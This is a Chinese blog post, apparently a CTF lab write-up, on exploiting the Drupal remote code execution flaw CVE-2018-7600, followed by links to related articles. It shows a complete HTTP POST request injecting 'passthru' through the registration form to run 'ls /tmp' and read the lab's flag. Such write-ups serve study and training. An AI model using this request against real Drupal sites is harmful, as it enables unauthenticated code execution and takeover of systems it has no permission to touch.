抓洞指南- drupal1 代码执行 (CVE-2018-7600)

最新推荐文章于 2025-05-14 17:44:43 发布
最新推荐文章于 2025-05-14 17:44:43 发布
阅读量184 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: okhttp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41722524/article/details/132360143
博主在不知flag位置时,突发奇想通过执行ls /tmp指令获取数据,此过程卡了很久,参考很多教程都不同,最终得到flag-{bmhe1d4ed70-7c7d-428a-8fb7-cf4145dc6805}。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一个非常憨逼的事情,就是不知道flag在哪,然后突发奇想,既然把指令都能执行命令,如果直接ls /tmp,然后数据就拿到手了。这地方卡了我很久,看了很多教程感觉都不一样。

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 10.11.12.28
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.7:8088/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 742
Connection: close

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=passthru&mail[#type]=markup&mail[#markup]=ls /tmp

-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"

passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"

markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"

ls /tmp
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"

user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"

 flag-{bmhe1d4ed70-7c7d-428a-8fb7-cf4145dc6805}

网络安全方向相关课题和材料
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
10-30 1556
搜集大量网络安全行业开源项目一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。这个收集是一个长期的过程,我在GitHub创建了这个项目,专门用来收集一些优秀的甲方安全项目。还有很多很好的免费开源项目可供选择,下面列出的还只是其中很少的一部分,我将持续更新这个项目,欢迎Star。
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
Drupal远程代码执行CVE-2018-7600
ANOrange的博客
04-10 1367
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏。远程攻击者可利用该漏执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 1104
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
Vulhub漏复现系列(二):常见远程代码执行剖析
最新发布
2201_75445650的博客
05-14 882
自 2011 年开源以来,凭借其出色的解析速度和易用的 API,广泛应用于国内外的 Java 项目中。出现的漏的原因就是Drupal在渲染表单元素时,允许用户传入的结构被直接执行为回调函数,本质是不可信输入被传入可执行上下文,是一种典型的“反序列化”,“动态执行”问题。,带来了严重的安全隐患。如果传入的数据未做严格校验,攻击者可以构造恶意 JSON 数据,利用 Fastjson 的反序列化机制加载任意类,)注入表单字段的渲染流程中,从而导致服务器在生成响应时执行恶意命令,最终实现远程代码执行(RCE)。
vulhub:drupal 代码执行复现 (CVE-2018-7600)
sszsNo1的博客
07-02 629
vulhub:drupal 代码执行 (CVE-2018-7600)如何复现
Drupal远程代码执行(CVE-2018-7600)
渗透之路,攻防之间皆学问
03-31 5727
一. 漏原理 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏,编号CVE-2018-7600Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 二. 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 三. 漏环境搭建 ...
drupal 代码执行 (CVE-2018-7600)复现
YouthBelief的博客
11-04 4741
@[TOC](drupal 代码执行 (CVE-2018-7600)) drupal 代码执行 (CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 0x01描述 http://blog.nsfocus.net/cve-2018-7600-analysis/ 该漏的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻
全面保护Drupal应用:安全模块与策略指南
- 说明:虽然文档中称Drupalgeddon为一个Drush命令,它实际上是一个安全漏,即CVE-2014-3704,通常被称为Drupalgeddon2(SA-CORE-2018-002),而不是一个模块。它是一个严重的SQL注入漏,影响了Drupal 6, 7和8...
Python安全攻防-3渗透测试框架
快吃小蛋糕吧的博客
11-23 2309
最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。 Pocsuite框架: 这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏与POC的远程漏验证框架即可。 安装: 通过git克隆代码仓库 git clone https://github.com/knownsec/pocsuite3.git 克隆完成后,仓库结构大概是这样的.
快速检测Drupalgeddon攻击:Drush命令使用指南
这个漏通常被标记为CVE-2018-7600,它允许攻击者获取网站的控制权,进行未授权的操作。由于此漏的严重性,Drupal官方发布了紧急的安全更新,强烈建议所有Drupal用户尽快升级到相应的安全版本。 2. Drupalgeddon...
【渗透测试】Drupal CVE-2018-7600 远程代码执行-复现
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
01-11 1万+
Drupal CVE-2018-7600 远程代码执行-复现 漏简介: Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏原理: drupal的注册页面,当我们提交的数据有问题时,它
drupal远程代码执行 (CVE-2018-7600)学习与复现
seek_2022的博客
12-17 6250
CVE-2018-7600学习与复现
CVE-2018-7600 Drupal 远程代码执行分析复现
yzl_007的博客
08-09 937
CVE-2018-7600 Drupal 远程代码执行分析复现 漏描述 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 该漏的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 使用vulhub镜像环境docker-compose up -d 成
DRUPAL 8.x远程代码执行(CVE-2018-7600)
errorr0
07-28 3395
drupal命令执行
drupal cve-2018-7600 远程代码执行 简介
whatday的专栏
06-13 1758
分析 Drupal 在 3 月 28 日爆出一个远程代码执行CVE 编号 CVE-2018-7600,通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理,比如如下的数组: $form['choice_wrapper'] = array( '#tree' => FALSE, '#weight' => -4, '#prefix' => '<div class="clearfix" id="po
Drupal Drupalgeddon 2 远程代码执行CVE-2018-7600
limb0的博客
07-04 7191
Drupal Drupalgeddon 2 远程代码执行CVE-2018-7600) 一、漏介绍 2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行,攻击者可以利用Drupal网站漏,执行恶意代码,导致网站被完全控制。 漏影响范围: 截止2018年3月29日,还未有公开PoC Drupal 6.x版本 Drupal 7.x版本 Drupal 8.x版本 二、漏危害 远程代码执行。 三、漏验证 环境搭建: 实验环
CVE-2018-7600 Drupal 远程代码执行
星落的博客
04-07 915
介绍 Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行。 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2018-7600 docker-compose build docker-compose up -d 2.查看docker服务器情况 dock ps -a 3.环境启动后,访问`htt..
Drupal-CVE-2018-7600复现
m0_62008601的博客
08-04 1065
Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行Drupal 对 Form API (FAPI) AJAX 请求的输入卫生不足。接下来进行漏利用,参考https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py,通过bp包,直接取这个页面的数据包(安装完drupal是登录状态的话需退出登录才能访问到这个页面)启动环境之后,浏览器进行访问,看到是drupal的安装页面,一路默认配置下一步安装。.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七咔七咔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值